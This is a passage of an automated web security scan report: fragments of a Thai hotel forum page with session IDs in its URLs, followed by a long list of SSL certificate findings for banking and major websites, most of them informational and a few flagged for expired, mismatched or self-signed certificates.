<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=3082.msg8440;topicseen#msg8440">Re: Travel, Hotel Link Exchange</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15102">hotelmango</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=15.0">Relevant Link Exchange</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=6130.msg8437;topicseen#msg8437">Re: Cheap Taxi Insurance</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15682">medanum6298</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=13.0">General talk</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=6134.msg8436;topicseen#msg8436">Re: Taximeter to Calculate the Taxi Fares</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15670">willnell</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=13.0">General talk</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=6133.msg8435;topicseen#msg8435">Re: Taxis for sale from used taxi firms</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15670">willnell</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=13.0">General talk</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=6132.msg8434;topicseen#msg8434">Re: Taxi Services in Mississauga</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15670">willnell</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=13.0">General talk</a>
...[SNIP]...
<td class="windowbg" width="20" valign="middle" align="center">
                       <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=stats"><img src="http://www.thailandhotelforums.com/forum/Themes/default/images/icons/info.gif" alt="Forum Stats" />
...[SNIP]...
<b> <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15975">colbygross12</a>
...[SNIP]...
<b>&quot;<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=4315.msg8511#new" title="Re: travelling ">Re: travelling </a>
...[SNIP]...
<br />
                           <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=recent">View the most recent posts on the forum.</a><br />
                           <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=stats">[More Stats]</a>
...[SNIP]...
<td class="titlebg" colspan="2">Login <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=reminder" class="smalltext">(Forgot your password?)</a>
...[SNIP]...
<td class="windowbg" width="20" align="center">
                       <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=login"><img src="http://www.thailandhotelforums.com/forum/Themes/default/images/icons/login.gif" alt="Login" />
...[SNIP]...

13. SSL certificate  previous  next
There are 30 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



13.1. https://eprocurement.ktb.co.th/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://eprocurement.ktb.co.th
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  eprocurement.ktb.co.th
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Sat Apr 24 19:00:00 CDT 2010
Valid to:  Wed May 25 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  eprocurement.ktb.co.th
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Sat Apr 24 19:00:00 CDT 2010
Valid to:  Wed May 25 18:59:59 CDT 2011

13.2. https://feedback.live.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://feedback.live.com
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  feedback.office.microsoft.com
Issued by:  Microsoft Secure Server Authority
Valid from:  Tue Oct 12 14:57:06 CDT 2010
Valid to:  Thu Oct 11 14:57:06 CDT 2012

Certificate chain #1

Issued to:  CN=Microsoft Secure Server Authority,DC=redmond,DC=corp,DC=microsoft,DC=com
Issued by:  CN=Microsoft Internet Authority
Valid from:  Wed May 19 17:13:30 CDT 2010
Valid to:  Mon May 19 17:23:30 CDT 2014

Certificate chain #2

Issued to:  CN=Microsoft Internet Authority
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Apr 14 13:12:26 CDT 2010
Valid to:  Sat Apr 14 13:12:14 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

Certificate chain #4

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

13.3. https://home.controlcase.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://home.controlcase.com
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  CN=localhost
Issued by:  CN=localhost
Valid from:  Tue Nov 10 17:48:47 CST 2009
Valid to:  Fri Nov 08 17:48:47 CST 2019

13.4. https://adwords.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  adwords.google.com
Issued by:  Google Internet Authority
Valid from:  Wed Apr 13 04:20:26 CDT 2011
Valid to:  Fri Apr 13 04:30:26 CDT 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 15:43:27 CDT 2009
Valid to:  Fri Jun 07 14:43:27 CDT 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

13.5. https://apps.barclays.co.uk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://apps.barclays.co.uk
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  apps.barclays.co.uk
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Wed Feb 09 18:00:00 CST 2011
Valid to:  Fri Feb 10 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.6. https://center.ktam.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://center.ktam.co.th
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  center.ktam.co.th
Issued by:  Thawte DV SSL CA
Valid from:  Wed Dec 15 18:00:00 CST 2010
Valid to:  Sun Jan 15 17:59:59 CST 2012

Certificate chain #1

Issued to:  Thawte DV SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Wed Feb 17 18:00:00 CST 2010
Valid to:  Mon Feb 17 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

13.7. https://csc.scb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://csc.scb.co.th
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  csc.scb.co.th
Issued by:  Entrust Certification Authority - L1C
Valid from:  Wed Jun 23 22:26:45 CDT 2010
Valid to:  Sat Jun 23 22:56:44 CDT 2012

Certificate chain #1

Issued to:  Entrust Certification Authority - L1C
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Thu Dec 10 14:43:54 CST 2009
Valid to:  Tue Dec 10 15:13:54 CST 2019

Certificate chain #2

Issued to:  Entrust.net Certification Authority (2048)
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Mon Mar 23 10:18:27 CDT 2009
Valid to:  Sat Mar 23 10:48:27 CDT 2019

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

13.8. https://ebank.kasikornbankgroup.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ebank.kasikornbankgroup.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  ebank.kasikornbankgroup.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Feb 09 18:00:00 CST 2011
Valid to:  Fri Feb 10 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.9. https://ibank.barclays.co.uk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ibank.barclays.co.uk
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  ibank.barclays.co.uk
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Mon Jul 12 19:00:00 CDT 2010
Valid to:  Sun Aug 07 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.10. https://ibanking.bangkokbank.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ibanking.bangkokbank.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  ibanking.bangkokbank.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Thu Oct 28 19:00:00 CDT 2010
Valid to:  Sun Oct 28 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.11. https://ipay.bangkokbank.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ipay.bangkokbank.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  ipay.bangkokbank.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Tue Aug 03 19:00:00 CDT 2010
Valid to:  Fri Aug 03 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.12. https://k-invest.kasikornbankgroup.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://k-invest.kasikornbankgroup.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  k-invest.kasikornbankgroup.com
Issued by:  Entrust Certification Authority - L1C
Valid from:  Mon Nov 22 16:27:51 CST 2010
Valid to:  Thu Nov 13 00:40:24 CST 2014

Certificate chain #1

Issued to:  Entrust Certification Authority - L1C
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Thu Dec 10 14:43:54 CST 2009
Valid to:  Tue Dec 10 15:13:54 CST 2019

Certificate chain #2

Issued to:  Entrust.net Certification Authority (2048)
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Fri Dec 24 11:50:51 CST 1999
Valid to:  Tue Jul 24 09:15:12 CDT 2029

13.13. https://kcustodian.kasikornbank.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://kcustodian.kasikornbank.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  Kcustodian.Kasikornbank.Com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Sun Feb 27 18:00:00 CST 2011
Valid to:  Sat Mar 03 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036

Certificate chain #3

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036

13.14. https://ksupplychain.kasikornbank.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ksupplychain.kasikornbank.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  ksupplychain.kasikornbank.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Wed Oct 20 19:00:00 CDT 2010
Valid to:  Fri Nov 25 17:59:59 CST 2011

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036

13.15. https://ktradeconnect.kasikornbank.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ktradeconnect.kasikornbank.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  ktradeconnect.kasikornbank.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Nov 17 18:00:00 CST 2010
Valid to:  Fri Nov 18 17:59:59 CST 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.16. https://letmechoose.barclays.co.uk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://letmechoose.barclays.co.uk
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  letmechoose.barclays.co.uk
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Thu Sep 23 19:00:00 CDT 2010
Valid to:  Sat Sep 24 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.17. https://online.kasikornbankgroup.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.kasikornbankgroup.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  online.kasikornbankgroup.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Nov 24 18:00:00 CST 2010
Valid to:  Fri Nov 25 17:59:59 CST 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.18. https://secure.wikimedia.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.wikimedia.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.wikimedia.org
Issued by:  Equifax Secure Certificate Authority
Valid from:  Tue Aug 03 10:43:56 CDT 2010
Valid to:  Sat Aug 22 17:23:10 CDT 2015

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

13.19. https://ws10.kasikornbank.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ws10.kasikornbank.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  ws10.kasikornbank.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Mon Sep 20 19:00:00 CDT 2010
Valid to:  Wed Nov 30 17:59:59 CST 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.20. https://www.barclays-home-insurance.co.uk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.barclays-home-insurance.co.uk
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.barclays-home-insurance.co.uk
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Wed Sep 29 19:00:00 CDT 2010
Valid to:  Fri Sep 30 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.21. https://www.barclaysfantasyfundmanager.co.uk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.barclaysfantasyfundmanager.co.uk
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.barclaysfantasyfundmanager.co.uk
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Wed Oct 27 19:00:00 CDT 2010
Valid to:  Fri Oct 28 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.22. https://www.bizpayment.ktb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bizpayment.ktb.co.th
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.bizpayment.ktb.co.th
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Thu Mar 31 19:00:00 CDT 2011
Valid to:  Wed May 30 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.23. https://www.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.google.com
Issued by:  Thawte SGC CA
Valid from:  Thu Dec 17 18:00:00 CST 2009
Valid to:  Sun Dec 18 17:59:59 CST 2011

Certificate chain #1

Issued to:  Thawte SGC CA
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed May 12 19:00:00 CDT 2004
Valid to:  Mon May 12 18:59:59 CDT 2014

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.24. https://www.ktamsmarttrade.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ktamsmarttrade.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.ktamsmarttrade.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Mon Jan 17 18:00:00 CST 2011
Valid to:  Sun Mar 18 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.25. https://www.ktb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ktb.co.th
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

